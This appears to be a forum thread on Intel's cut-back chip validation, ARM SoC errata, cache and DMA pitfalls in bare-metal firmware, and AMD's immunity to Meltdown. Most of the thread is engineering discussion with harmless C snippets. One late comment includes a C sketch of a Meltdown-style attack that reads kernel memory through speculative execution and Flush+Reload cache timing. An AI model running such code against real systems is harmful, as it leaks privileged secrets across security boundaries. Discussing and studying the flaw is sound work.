
This is typically what happens when you go for a long time without real competition. You get way too comfortable and bad habits start to pile up.



Isn't the reason this problem even exists the exact opposite? Intel was losing in the mobile market and changed its internal testing to iterate faster by cutting corners.

Found a quote:

"We need to move faster. Validation at Intel is taking much longer than it does for our competition. We need to do whatever we can to reduce those times… we can’t live forever in the shadow of the early 90’s FDIV bug, we need to move on. Our competition is moving much faster than we are".


Man, you should see the errata for some ARM-based SOCs. It's amazing that they work at all.

Vendor, in conversation: "We're pretty sure we can make the next version do cache coherency correctly."

Me (paraphrased): "Don't let the door hit you in the ass on the way out."

Management chain chooses them anyway, I spend the next year chasing down cache-related bugs. Fun.


ARM is such a shitstorm. At least the PC, with UEFI, is a standard. With every ARM device, you have to have a specialized kernel ROM just for that device. There have been efforts like PostmarketOS, but in general ARM isn't an architecture; it's random pins soldered to an SoC to make a single-use pile of shit.


Why is it an issue to need a different kernel image for each device? I don't see a problem as long as there is a simple mechanism to specify your device and generate the right image. It's already like that with coreboot/libreboot/librecore, and it worked just fine for me.


Imagine that you are the person leading the team that's making an embedded system on an ARM SOC. It's not Linux, so you have your own boot code, drivers and so forth. It's not just a matter of "welp, get another kernel image." You're doing everything from the bare metal on up.

(I should remark that there are good reasons for this effort: it boots in under 500 ms, it's crazy efficient, it doesn't use much RAM, and your company won't let you use anything GPL-licensed for reasons the lawyers are adamant about.)

So now you get to find all the places where the vendor documentation, sample code and so forth is wrong, or missing entirely, or telling the truth but about a different SOC. You find the race conditions, the timing problems, the magic tuning parameters that make things like the memory controller and the USB system actually work, the places where the cache system doesn't play well with various DMA controllers, the DMA engines that run wild and stomp memory at random, the I2C interfaces that randomly freeze or corrupt data . . . I could go on.
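
To make the cache/DMA interplay concrete, here is a minimal ARMv7-A-flavored sketch of the kind of explicit maintenance code you end up writing by hand. It's a sketch under assumptions: the 64-byte line size and the dma_start_rx()/dma_start_tx()/dma_wait_done() hooks are illustrative stand-ins, not any vendor's API.

    #include <stddef.h>
    #include <stdint.h>

    #define CACHE_LINE 64u  /* assumption: read the real line size from CTR on the actual core */

    /* Hypothetical driver hooks standing in for whatever the vendor's DMA API looks like. */
    extern void dma_start_rx(uint8_t *buf, size_t len);
    extern void dma_start_tx(const uint8_t *buf, size_t len);
    extern void dma_wait_done(void);

    /* ARMv7-A data-cache maintenance by address (privileged, i.e. RTOS/kernel code). */
    static inline void dcache_clean_range(uintptr_t start, size_t len)
    {
        for (uintptr_t a = start & ~(uintptr_t)(CACHE_LINE - 1); a < start + len; a += CACHE_LINE)
            __asm__ volatile("mcr p15, 0, %0, c7, c10, 1" :: "r"(a) : "memory");  /* DCCMVAC */
        __asm__ volatile("dsb" ::: "memory");
    }

    static inline void dcache_invalidate_range(uintptr_t start, size_t len)
    {
        for (uintptr_t a = start & ~(uintptr_t)(CACHE_LINE - 1); a < start + len; a += CACHE_LINE)
            __asm__ volatile("mcr p15, 0, %0, c7, c6, 1" :: "r"(a) : "memory");   /* DCIMVAC */
        __asm__ volatile("dsb" ::: "memory");
    }

    /* Non-coherent TX: push CPU writes out to RAM before the device reads the buffer. */
    void send_from(const uint8_t *buf, size_t len)
    {
        dcache_clean_range((uintptr_t)buf, len);
        dma_start_tx(buf, len);
        dma_wait_done();
    }

    /* Non-coherent RX: invalidate before the device writes (so no dirty line gets
     * evicted over its data) and again, paranoidly, before the CPU reads the result,
     * in case speculation or prefetch repopulated lines during the transfer. */
    void receive_into(uint8_t *buf, size_t len)
    {
        dcache_invalidate_range((uintptr_t)buf, len);
        dma_start_rx(buf, len);
        dma_wait_done();
        dcache_invalidate_range((uintptr_t)buf, len);
    }

Get the clean/invalidate direction wrong, or drop a barrier, and you have exactly the kind of bug that only shows up under load on one particular SoC.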

It's fun, but nothing you learn is very transferrable (with the possible exception of mistrust of people at big silicon houses who slap together SOCs).


The responsibility to document the quirks and necessary workarounds lies with the manufacturer of the hardware. If the manufacturer doesn't provide the necessary documentation, then that's exactly what you have: insufficient documentation to use the device.

There are hardware manufacturers that are better than others at being open and providing documentation. My minimum level of required support and documentation right now is mainline Linux support.

Can you document your work publicly, or is there something I can read about it? I'm very interested in alternative kernels besides Linux.


> The responsibility to document the quirks and necessary workarounds lies with the manufacturer of the hardware.

When you buy an SOC, the /contract/ you have with the chip company determines the extent and depth of their responsibility. On the other hand, they do want to sell chips to you, hopefully lots of them, so it's not like they're going to make life difficult.

Some vendors are great at support. They ship you errata without you needing to ask, they are good at fielding questions, they have good quality sample code.

Other vendors will put even large customers on tier-1 support by default, where your engineers have to deal with crappy filtering and answer inane questions over a period of days before getting any technical engagement. Issues can drag on for months. Sometimes you need to get VPs involved, on both sides, before you can get answers.

The real fun is when you use a vendor that is actively hiding chip bugs and won't admit to issues, even when you have excellent data that exposes them. For bonus points, there are vendors that will rev chips (fixing bugs) without revving chip version identifiers: Half of the chips you have will work, half won't, and you can't tell which are which without putting them into a test setup and running code.


Arm is a problem for all kernels, not just Linux, in how on-chip peripherals are mapped, etc. All the problems that UEFI solves are still unsolved on Arm.


Yep. I've seen scary errata and had paranoid cache flushes in my code as a precaution.

My favorite ARM experience was when memcpy() was broken in an RTOS for "some cases". "Some cases" turned out to be when the size of the copy wasn't a multiple of the cache line size. Scary stuff.
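
The workaround ends up looking something like the wrapper below: a hedged sketch, assuming a 32-byte line size and a vendor memcpy() that only behaves for whole-line sizes; safe_memcpy is a made-up name, not any RTOS API.

    #include <stddef.h>
    #include <stdint.h>
    #include <string.h>

    #define CACHE_LINE 32u  /* assumption: whatever size the vendor routine actually handles */

    /* Route only whole-cache-line sizes through the vendor memcpy(); byte-copy the tail. */
    void *safe_memcpy(void *dst, const void *src, size_t n)
    {
        size_t bulk = n & ~(size_t)(CACHE_LINE - 1);    /* largest multiple of the line size */
        if (bulk)
            memcpy(dst, src, bulk);                     /* the path the vendor code gets right */

        uint8_t *d = (uint8_t *)dst + bulk;
        const uint8_t *s = (const uint8_t *)src + bulk;
        for (size_t i = 0; i < n - bulk; i++)           /* slow but correct tail */
            d[i] = s[i];
        return dst;
    }

Slower, sure, but it beats chasing one-byte corruption through a week of logs.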


Obvious hypothesis: first complacency leads to incompetence, then starting to cut corners has catastrophic consequences. The two problems are wonderfully complementary.

As other comments suggest, there might be a third stage, completely forgetting how to design and validate chips properly.


Or the system was designed poorly to begin with and now you're stuck with the design for backwards compatibility reasons.


I'd expect engineers that are aware of such serious bugs to spit on the grave of backwards compatibility. After all, the worst case impact would be smaller than the current emergency patches: rewriting small parts of operating systems with a variant for new fixed processors.


I think that could also have been the "official reason".

The same reason could also have been used to give the NSA some legroom, for instance, while telling everyone that's why they won't do as much verification in the future.


This implies that ARM vendors do less validation. I guess ARM is just so much simpler that good enough validation can be done faster. So essentially this is payback time for Intel for keeping compatibility with older code and a simpler-to-program architecture (stricter cache coherence, etc.). It's as if you can only have two of cheap, reliable, and easy to program.


I'm sure ARM vendors have their own problems... it's just that their chips tend to be used in application-specific products, so the bugs get worked around. Coming from a firmware background, I've seen tons of ugly workarounds for serious bugs in validated hardware.

Furthermore, I just read an article (can't find the link) saying that certain ARM Cortex cores have the same issues as Intel.


> This implies that ARM vendors do less validation. I guess ARM is just so much simpler that good enough validation can be done faster.

More likely "good enough" is much lower because ARM users aren't finding the bugs. The workloads that find these bugs in Intel systems are: heavy compilation, heavy numeric computation, privilege escalation attackers on multi-user systems. Those use cases barely exist on ARM: who's running a compile farm on ARM, or doing scientific computation on an ARM cluster, or offering a public cloud running on ARM?


Where’s that quote from? ISTR reading it (or something very similar) as reported speech in a HN comment.

Overall it's a depressing story of predictable market failure as well as internal misbehavior at Intel, if true. Few buyers want to pay or wait for correctness unless a sufficiently bad bug is sufficiently fresh in human memory. And if you do want to, it's not as if you're blessed with many convenient alternatives.


The quote is from the link above (referencing an anonymous reddit comment).


That is a very interesting perspective, and as far as I know it is correct, though perhaps Intel's situation in the mobile market was exacerbated by complacency?


There are people looking to deploy ARM servers now. However, I wish there had been more server competition. Many companies write their backend services in Python, JVM languages (Java/Scala/Groovy), Ruby, etc.: stuff that would run fine on Power, ARM, or other architectures. There are very few specialized libraries that really require x86_64 (like ffmpeg and video transcoding).


ffmpeg works great on ARM. I don't know if the PPC port is all that optimized lately.


But why do AMD chips not have similar issues? To me it looks like Intel tried to micro-optimize something and screwed up.


According to LKML: https://lkml.org/lkml/2017/12/27/2

> The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

Out-of-order processors generally trigger exceptions when instructions are retired. Because instructions are retired in-order, that allows exceptions and interrupts to be reported in program order, which is what the programmer expects to happen. Furthermore, because memory access is a critical path, the TLB/privilege check is generally started in parallel with the cache/memory access. In such an architecture, it seems like the straightforward thing to do is to let the improper access to kernel memory execute, and then raise the page fault only when the instruction retires.
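
That "raise the fault at retirement" window is exactly what the published Meltdown-style proofs of concept observe through the cache. Below is a rough, heavily simplified sketch of the idea; the kernel address, the 80-cycle threshold, and recovery via SIGSEGV are all illustrative assumptions, a real PoC needs far more care, and this reveals nothing on patched or unaffected hardware.

    #include <setjmp.h>
    #include <signal.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <x86intrin.h>

    #define STRIDE 4096  /* one page per byte value, to keep the prefetcher out of the way */

    static uint8_t probe[256 * STRIDE];
    static sigjmp_buf recover;

    static void on_segv(int sig) { (void)sig; siglongjmp(recover, 1); }

    /* Time one load; a fast access means the line was already cached. */
    static uint64_t time_access(volatile uint8_t *p)
    {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        return __rdtscp(&aux) - t0;
    }

    int main(void)
    {
        /* Placeholder address: a real attempt would target a mapped kernel address. */
        volatile uint8_t *kernel_addr = (volatile uint8_t *)0xffffffff81000000ULL;

        signal(SIGSEGV, on_segv);
        memset(probe, 1, sizeof probe);              /* make sure the probe pages are mapped */
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe[i * STRIDE]);

        if (sigsetjmp(recover, 1) == 0) {
            /* The load below faults at retirement, but on affected parts the dependent
             * probe access may execute transiently first, caching one probe line. */
            uint8_t secret = *kernel_addr;
            (void)*(volatile uint8_t *)&probe[secret * STRIDE];
        }

        /* Flush+Reload: whichever probe line comes back fast encodes the byte. */
        for (int i = 0; i < 256; i++)
            if (time_access(&probe[i * STRIDE]) < 80)   /* threshold is machine-dependent */
                printf("candidate byte: 0x%02x\n", i);

        return 0;
    }

AMD's statement above is precisely the claim that the dependent probe access never executes, even transiently, when the first load would fault on a privilege check.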


Maybe the answer lies in Intel’s feted IPC advantage over AMD? Or is it the case that AMD has simply been relatively lucky so far?



